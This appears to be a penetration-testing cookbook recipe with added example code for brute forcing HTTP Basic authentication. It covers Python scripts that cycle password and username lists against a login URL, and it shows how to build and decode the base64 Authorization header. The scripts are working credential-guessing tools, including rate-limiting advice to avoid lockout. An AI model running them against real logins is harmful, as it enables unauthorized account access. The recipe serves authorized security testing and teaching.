Brute forcing login through the Authorization header

Many websites use HTTP basic authentication to restrict access to content. This is especially prevalent in embedded devices such as routers. The Python requests library has built-in support for basic authentication, which makes it easy to write an authentication brute force script.

Getting ready

Before creating this recipe, you're going to need a list of passwords to attempt to authenticate with. Create a local text file called passwords.txt, with each password on a new line. Check out Brute forcing passwords in Chapter 2, Enumeration, for password lists from online resources. Also, spend some time scoping out the target server: you need to know how it responds to a failed login request (normally a 401 status), so that the script can tell a successful guess from a failed one, and you should only be doing this against a target you are authorized to test.

How to do it…

The following code will attempt to brute force entry to a website through basic authentication:

import requests
from requests.auth import HTTPBasicAuth

TARGET = 'http://packtpub.com/admin_login.html'
USERNAME = 'admin'

with open('passwords.txt') as passwords:
    for password in passwords:
        password = password.strip()
        if not password:
            continue  # skip blank lines in the word list
        req = requests.get(TARGET, auth=HTTPBasicAuth(USERNAME, password))
        if req.status_code == 401:
            # 401 Unauthorized: the server rejected these credentials
            print(password, 'failed.')
        elif req.status_code == 200:
            print('Login successful, password:', password)
            break
        else:
            # Any other status (403 lockout, 429 throttling, 5xx) is unexpected:
            # stop and investigate rather than keep hammering the target
            print('Error occurred with', password, '(HTTP status', req.status_code, ')')
            break

How it works…

The first part of this script reads in the password list, line by line. Then, it sends an HTTP GET request to the login page:

req = requests.get('http://packtpub.com/admin_login.html', auth=HTTPBasicAuth('admin', password))

This request has an additional auth parameter, which contains the username admin and the password read from the passwords.txt file. When requests sends the HTTP request, it adds a basic Authorization header, which in the raw request looks like the following:

Authorization: Basic YWRtaW46cGFzc3dvcmQx

Notice that in the Authorization header the credentials are sent in an encoded, not encrypted, form, such as YWRtaW46cGFzc3dvcmQx. This is the string username:password in base64; the requests.auth.HTTPBasicAuth class just does this conversion for us. Because base64 is trivially reversible, anyone who can see the request on the wire (plain HTTP, as in this example) can recover the password. This can be verified by using the base64 module from the standard library, as shown in the following screenshot:

[Screenshot: base64 encoding admin:password1 gives YWRtaW46cGFzc3dvcmQx, and decoding it returns the plaintext]

Knowing this means that you could still get the script to run without the external requests library; instead, it would craft the Authorization header manually using the base64 module from the standard library.
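The following is an added example (not code from the book) that does exactly that: it builds and decodes the Basic credential with the standard base64 module and sends one request with urllib, so no third-party library is needed. The try_login function is also a convenient way to do the scoping step from Getting ready, since it returns whatever status code the server gives for a bad password. The target URL and the password password1 are the ones from the text; the Content of the decoded header is an assumption checked against the token shown above.

```python
import base64
import urllib.error
import urllib.request


def basic_auth_header(username, password):
    """Build the value of an HTTP Basic Authorization header by hand.

    RFC 7617 defines the credential as base64(username ":" password).
    The username must not contain a colon, because the server splits
    the decoded string on the first ':'; the password may contain one.
    """
    if ':' in username:
        raise ValueError('username may not contain a colon')
    raw = f'{username}:{password}'.encode('utf-8')
    return 'Basic ' + base64.b64encode(raw).decode('ascii')


def decode_basic_auth(header_value):
    """Reverse of basic_auth_header: recover (username, password) from a header value."""
    scheme, _, token = header_value.partition(' ')
    if scheme.lower() != 'basic':
        raise ValueError('not a Basic credential')
    raw = base64.b64decode(token).decode('utf-8')
    username, _, password = raw.partition(':')
    return username, password


def try_login(url, username, password, timeout=10):
    """Send one GET with a hand-built Authorization header, standard library only.

    Returns the HTTP status code. urllib raises HTTPError for 4xx/5xx
    responses, so the 401 expected on a wrong password is caught and
    returned as a plain number, the same way requests reports it.
    """
    request = urllib.request.Request(url)
    request.add_header('Authorization', basic_auth_header(username, password))
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == '__main__':
    # Reproduces the token from the text: admin:password1 -> YWRtaW46cGFzc3dvcmQx
    print(basic_auth_header('admin', 'password1'))
    print(decode_basic_auth('Basic YWRtaW46cGFzc3dvcmQx'))
    # Scoping step: what does the target return for a deliberately wrong password?
    # print(try_login('http://packtpub.com/admin_login.html', 'admin', 'not-the-password'))
```

Running the block prints the encoded header and its decoded pair; uncomment the last line to probe a live target and confirm it really answers a bad password with 401 before trusting the status-code logic in the recipe.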

The following is a screenshot of the brute force script in action:

[Screenshot: the brute force script printing each failed password, then "Login successful, password:" for the matching one]

There's more…

In this example, we've used a fixed username of admin in the authorization request, as this was known. If it is unknown, you could create a usernames.txt text file and loop through each of its lines too, just as we've done with the password text file. Note that this is a much slower process (every username multiplied by every password) and creates a lot of HTTP requests to the target site, which is likely to trigger account lockout or get your address blocked, unless you implement rate limiting.
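The following is an added example, not the book's own code, of the combined username and password loop described above with the rate limiting it recommends. The attempt function is passed in so the search logic can be exercised offline against a constructed stand-in server; http_attempt shows the real version using requests with a single reusable Session. Unlike the recipe, it treats any status other than 200 or 401 (a 403 lockout or 429 throttle, for instance) as a reason to stop immediately. The file names usernames.txt and passwords.txt and the accepted pair admin:password1 in the stand-in are assumptions for illustration.

```python
import itertools
import time


def read_wordlist(path):
    """Read one candidate per line, dropping blank lines and surrounding whitespace."""
    with open(path) as handle:
        return [line.strip() for line in handle if line.strip()]


def http_attempt(url):
    """Return an attempt function that sends a real Basic-auth GET and yields the status code."""
    import requests  # imported here so the search logic below has no third-party dependency
    from requests.auth import HTTPBasicAuth
    session = requests.Session()  # reuse one connection across all attempts

    def attempt(username, password):
        return session.get(url, auth=HTTPBasicAuth(username, password)).status_code
    return attempt


def brute_force(usernames, passwords, attempt, delay=1.0):
    """Try every username/password pair in order.

    attempt(username, password) must return an HTTP status code.
    200 means success and the pair is returned; 401 means keep going;
    anything else is unexpected (lockout, throttling, server error), so
    a RuntimeError is raised rather than continuing to hit the target.
    delay seconds are slept between requests as simple rate limiting.
    Returns None when the whole space is exhausted without a hit.
    """
    for username, password in itertools.product(usernames, passwords):
        status = attempt(username, password)
        if status == 200:
            return username, password
        if status != 401:
            raise RuntimeError(f'unexpected HTTP {status} for {username}:{password}; stopping')
        time.sleep(delay)
    return None


if __name__ == '__main__':
    # Constructed stand-in for the target so the example runs offline:
    # only admin:password1 is accepted, every other pair gets a 401.
    def fake_server(username, password):
        return 200 if (username, password) == ('admin', 'password1') else 401

    print('found:', brute_force(['root', 'admin'], ['letmein', 'password1'], fake_server, delay=0))
    # Against a live target (assumed file names and URL from the recipe):
    # brute_force(read_wordlist('usernames.txt'), read_wordlist('passwords.txt'),
    #             http_attempt('http://packtpub.com/admin_login.html'), delay=1.0)
```

The delay is deliberately a parameter: start at a second or more and watch the responses, because a target that answers 429 or starts returning 403 for every pair has noticed you, and the loop stops on the first such response so you can decide what to do rather than burning through the rest of the list.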

See also

Check out the Checking username validity and Brute forcing usernames recipes in Chapter 2, Enumeration, for further ideas on username and password combinations.
